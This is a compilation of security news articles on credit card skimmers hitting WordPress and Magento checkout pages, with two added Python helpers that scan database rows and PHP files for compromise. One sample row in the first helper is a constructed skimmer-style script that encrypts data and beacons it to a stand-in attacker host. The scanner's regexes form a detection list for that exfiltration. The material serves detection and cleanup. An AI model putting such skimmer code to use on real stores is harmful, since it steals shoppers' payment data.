Sophisticated Credit Card Skimmer Malware Targets WordPress Checkout Pages

 


Recent cybersecurity reports have highlighted a new, highly sophisticated credit card skimmer malware targeting WordPress checkout pages. This stealthy malware embeds malicious JavaScript into database records, leveraging database injection techniques to effectively steal sensitive payment information. Its advanced design poses significant risks to e-commerce platforms and their users. 
  
Widespread Impact on E-Commerce Platforms 
 
Multiple content management systems (CMS), including WordPress, Magento, and OpenCart, have been targeted by the Caesar Cipher Skimmer. This web skimmer enables the theft of payment data, threatening the financial security of businesses and consumers alike. 

Web skimmers are malicious scripts injected into e-commerce websites to collect financial and payment transaction details. According to cybersecurity firm Sucuri, a recent attack involved modifying the "form-checkout.php" file in the WooCommerce plugin to steal credit card information.
  • Consequences: Financial losses, reputational damage, and legal expenses.
  • Detection Difficulty: Often remains unnoticed until after the damage has occurred.

Signs of a compromised WooCommerce site include customer reports of stolen credit card details. This typically suggests malware capable of skimming customer credentials, warranting immediate investigation and remediation. 

On May 11, 2024, Sucuri identified a campaign misusing the "Dessky Snippets" WordPress plugin, which allows users to add custom PHP code. With over 200 active installations, the plugin was exploited by threat actors to inject malicious PHP code for credit card theft.
  • Attack Vectors: Exploiting plugin vulnerabilities and weak admin credentials.
  • Further Exploitation: Installing additional plugins to escalate malicious activities.
Database-Level Malware Infiltration 

Using the Dessky Snippets plugin, attackers deployed server-side PHP malware that embedded obfuscated JavaScript in the WordPress database.
  • Location: Stored in the wp_options table under widget_block.
  • Activation Trigger: Executes on pages containing "checkout" in the URL, avoiding pages with "cart."
Stealth and Strategic Execution

The malware activates only during the final transaction stage, intercepting sensitive financial data without disrupting the user experience.
  • Integration: Utilizes existing payment fields to avoid detection.
  • Stealth Tactics: Remains hidden from standard file-scanning tools, because the payload lives in the database rather than in a file on disk.

To conceal its activities, the malware obfuscates stolen data with Base64 encoding and AES-CBC encryption. The encrypted data is discreetly sent to attacker-controlled servers via the navigator.sendBeacon function, ensuring stealthy exfiltration without alerting users or administrators.

Severe Security Implications

This malware poses a critical threat by covertly harvesting sensitive payment information, including credit card numbers and CVV codes.
  • Potential Risks: Fraudulent transactions, identity theft, and illegal data sales.
  • Impact on Businesses: Financial losses, legal liabilities, reputational damage, and erosion of customer trust.
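Because the skimmer lives in the database rather than on disk, file scanners miss it; the check has to run over the wp_options rows themselves. The Python below is an added example (not code from the original post or from Sucuri): it scores exported wp_options rows against the indicators the post names, a script inside a widget_block entry that gates on "checkout" but not "cart", uses Base64, AES-CBC and navigator.sendBeacon. The row format, the weights and the sample rows are assumptions constructed for the demo.

```python
"""Heuristic scan of WordPress wp_options rows for the widget_block skimmer
pattern described above. Hypothetical helper, not Sucuri's tooling."""
import re

# Each indicator is a regex plus a weight; all derive from the behaviour
# described in the post (checkout/cart gating, sendBeacon, Base64, AES-CBC).
INDICATORS = [
    (re.compile(r"<script\b", re.I), 1, "inline <script> inside a widget block"),
    (re.compile(r"sendBeacon\s*\(", re.I), 3, "navigator.sendBeacon exfiltration"),
    (re.compile(r"""['"]checkout['"]""", re.I), 2, "checks URL for 'checkout'"),
    (re.compile(r"""['"]cart['"]""", re.I), 1, "checks URL for 'cart'"),
    (re.compile(r"\b(btoa|atob)\s*\(", re.I), 1, "Base64 encode/decode"),
    (re.compile(r"AES-CBC", re.I), 3, "AES-CBC via WebCrypto"),
]
ALERT_THRESHOLD = 5  # assumed cut-off; tune against your own false positives

def scan_option(option_name, option_value):
    """Return (score, [reasons]) for one wp_options row (name, raw value)."""
    if option_name != "widget_block":
        return 0, []
    score, reasons = 0, []
    for pattern, weight, reason in INDICATORS:
        if pattern.search(option_value):
            score += weight
            reasons.append(reason)
    return score, reasons

def find_suspicious(rows, threshold=ALERT_THRESHOLD):
    """Return the rows whose indicator score reaches the threshold."""
    hits = []
    for name, value in rows:
        score, reasons = scan_option(name, value)
        if score >= threshold:
            hits.append({"option_name": name, "score": score, "reasons": reasons})
    return hits

# Constructed sample rows: the second imitates the described skimmer shape
# (checkout-only gating, AES-CBC, Base64, sendBeacon) and is not real malware.
SAMPLE_ROWS = [
    ("widget_block", "<!-- wp:paragraph --><p>Free shipping over $50</p><!-- /wp:paragraph -->"),
    ("widget_block",
     "<script>if(location.href.includes('checkout')&&!location.href.includes('cart')){"
     "crypto.subtle.encrypt({name:'AES-CBC',iv:iv},key,buf).then(function(c){"
     "navigator.sendBeacon('https://attacker.invalid/x',btoa(String.fromCharCode"
     ".apply(null,new Uint8Array(c))))})}</script>"),
    ("siteurl", "https://shop.example"),
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_ROWS):
        print(hit)
```

Feed it the output of a `SELECT option_name, option_value FROM wp_options` export; any hit is a row to inspect by hand, not proof of compromise.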
Mitigation and Security Best Practices 
 
To counter such threats, e-commerce platforms must implement robust cybersecurity measures:
  • Regular monitoring of website activity for unusual behavior.
  • Timely updates of all plugins and platform software.
  • Proactive vulnerability management and penetration testing.
  • Strong admin credentials and limited plugin installations.
Staying vigilant and proactive in cybersecurity practices is essential to safeguarding sensitive customer data and maintaining the integrity of e-commerce operations.

E-commerce Breach: Hackers Target Magento, Steal Payment Data

 




In a concerning development for e-commerce security, hackers have been discovered exploiting a critical flaw in the popular Magento platform, leaving numerous online stores vulnerable to data breaches. The vulnerability, identified as CVE-2024-20720 with a severity score of 9.1, was acknowledged and addressed by Adobe in security updates released on February 13, 2024.

The exploit involves injecting a persistent backdoor into e-commerce websites, allowing threat actors to execute arbitrary commands and potentially steal sensitive payment data. Security experts from Sansec revealed that attackers are utilising a cleverly crafted layout template stored in the database to automatically insert malicious code into the system.

By combining the Magento layout parser with the beberlei/assert package, hackers can execute system commands, particularly targeting the checkout cart section of affected websites. This malicious code, facilitated by the 'sed' command, enables the installation of a payment skimmer, designed to capture and transmit financial information to compromised Magento stores under the attackers' control.

This incident underlines the urgency for e-commerce businesses to promptly apply security patches provided by Magento to mitigate the risk of exploitation. Failure to do so could leave them susceptible to financial losses and reputational damage.

The exploitation of vulnerabilities within the Magento platform has become an ongoing concern within the realm of e-commerce security. Since its acquisition by Adobe in 2018 for a significant $1.68 billion, Magento has grown to power more than 150,000 online stores worldwide. However, this widespread adoption has inadvertently made it an enticing target for cybercriminals seeking to exploit weaknesses in its infrastructure. One notable example of such exploitation is the MageCart attacks, which have highlighted the persistent threat posed by outdated and unsupported versions of Magento.

Given the prevalence of these vulnerabilities, it is pivotal for online merchants to prioritise cybersecurity measures to safeguard their customers' sensitive data and uphold trust within the e-commerce ecosystem. This necessitates a proactive approach that includes regular software updates, the implementation of robust security protocols, and continuous monitoring for any suspicious activities.

Industry stakeholders are urged to collaborate closely to enhance cybersecurity resilience and protect the integrity of online transactions. By staying informed and proactive, businesses can effectively combat cyber threats and uphold the security of their e-commerce operations.



Several Magento Sites were Targeted by a Surge of MageCart Attacks

 

A large number of online stores using the Magento 1 e-commerce system were targeted by a web skimmer, according to Sansec, an eCommerce security consultancy. 

The crawler detected roughly 374 infections in a single day, indicating an onslaught. The infection was downloaded from the domain naturalfreshmall[.]com, which is presently offline. The threat operators' purpose was to steal credit card information from consumers at the targeted online retailers.

The initial intrusion vector was a security flaw in the Quickview plugin, which attackers often use to insert rogue admin users into susceptible Magento stores. In this campaign, however, the flaw was exploited to add a default value, so that the database was updated with a file carrying a simple backdoor. Merely browsing the Magento login page then triggered the validation rules for prospective customers and, with them, the code execution.

Abuse is possible by adding a default value to the customer_eav_attribute table. The host application is tricked into creating a malicious entity, which is then used to generate a basic backdoor (api 1.php). According to Sansec, the intruders installed 19 backdoors on the hacked system, so affected sites must remove all of them to avoid being targeted in future attacks.
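Because the intruders left 19 backdoors behind, cleanup means finding every PHP file that is not part of a known-good deployment. The Python below is an added example, not Sansec's tooling: it hashes the PHP files under a web root, compares them against a baseline manifest, and reports added, modified and removed files. The directory layout, file names and the simulated compromise are constructed for the demo.

```python
"""Baseline-and-diff check for PHP files under a web root. Added example;
the helper names, paths and scenario are illustrative."""
import hashlib
import os
import tempfile

def php_manifest(root):
    """Map each .php path (relative to root) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            manifest[os.path.relpath(full, root)] = digest
    return manifest

def diff_manifest(baseline, current):
    """Return (added, modified, removed) relative paths between two manifests."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, modified, removed

def demo():
    """Constructed scenario: a clean store, then one dropped file plus one
    tampered core file, the kind of leftovers the post says must all be removed."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "app", "code"))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php require 'app/Mage.php';\n")
        with open(os.path.join(root, "app", "code", "Helper.php"), "w") as fh:
            fh.write("<?php class Helper {}\n")
        baseline = php_manifest(root)  # would come from a known-good deploy
        # Simulated compromise (constructed): a new file and a modified one.
        with open(os.path.join(root, "api_backdoor_PLACEHOLDER.php"), "w") as fh:
            fh.write("<?php /* placeholder, not real malware */\n")
        with open(os.path.join(root, "index.php"), "a") as fh:
            fh.write("// appended line\n")
        return diff_manifest(baseline, php_manifest(root))

if __name__ == "__main__":
    added, modified, removed = demo()
    print("added:", added, "modified:", modified, "removed:", removed)
```

In practice the baseline manifest is generated from a fresh copy of the same Magento release and stored off the server, so a compromised host cannot rewrite it.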

Although thousands of merchants continue to use it, the Magento 1 platform has hit End-of-Life, and Adobe no longer provides security upgrades for the same. As a result, the sites are accessible to a wide range of cyberattacks, putting the clients' sensitive information at risk. These details usually include credit card numbers, mailing addresses, names, phone numbers, and email addresses, as well as anything else required to complete an online order.

All Magento administrators should make sure their store is running the most current edition of the platform and upgrade if it is on an older, unsupported version.

Outdated Magento 1 Witnessed Credit Card Skimming Threats

 

Magento is an open-source e-commerce platform that supplies online merchants with a scalable shopping cart system and lets them manage their online store's layout, content, and features. Since the fall of 2020, threat actors have been leveraging a flaw in the 'Magento 1' branch, which is no longer maintained.

Thousands of merchants worldwide still on that platform are encouraged to upgrade to 'Magento 2', as thousands of e-commerce shops were hacked and infected with credit card skimming code. While tracking events related to the 'Magento 1' campaign, researchers observed an e-commerce shop that was attacked twice by skimmers.

In this particular incident, the threat actors built a variant of their skimmer that recognises sites already injected by the Magento 1 skimmer. The second skimmer then collects credit card data from the pre-existing fake form that the earlier actors had injected.

"A large number of Magento 1 sites have been hacked but yet are not necessarily being monetized," as stated by the researcher at Malwarebytes. He further added that "Other threat actors that want access will undoubtedly attempt to inject their own malicious code. When that happens, we see criminals trying to access the same resources and sometimes fighting with one another."

The end-of-life of Magento 1, paired with a well-known exploit, was a boon for threat actors. Many sites were indiscriminately compromised simply because they were vulnerable. RiskIQ has attributed these cases to Magecart Group 12, which uses diverse tactics, including supply-chain attacks, and has a long history of web skimming.

Two web skimmers have been found on the payment pages of Costway, one of the leading retailers of appliances, furniture and similar goods in North America and Europe. The skimmers seek to capture consumers' payment and credit card information. "Our crawlers identified that the websites for Costway France, U.K., Germany, and Spain, which run the Magento 1 software, had been compromised around the same time frame," said researchers.

On the Costway check-out page, the researchers noticed the credit card skimmer injection, which stands out in English while the majority of the platform is in French. This is no surprise considering the automated and very indiscriminate Magento 1 hacking campaign. 

The threat to victims is huge: researchers say that in December 2020 alone, Costway's French portal (Costway[.]fr) received approximately 180K visitors. There is also a second skimmer on the site (loaded externally from securityxx[.]top) that targets the Magento 1 skimmer.

Many Magento 1 websites have been compromised but are not monetized yet. Additional attackers will certainly continue to inject their own malicious code.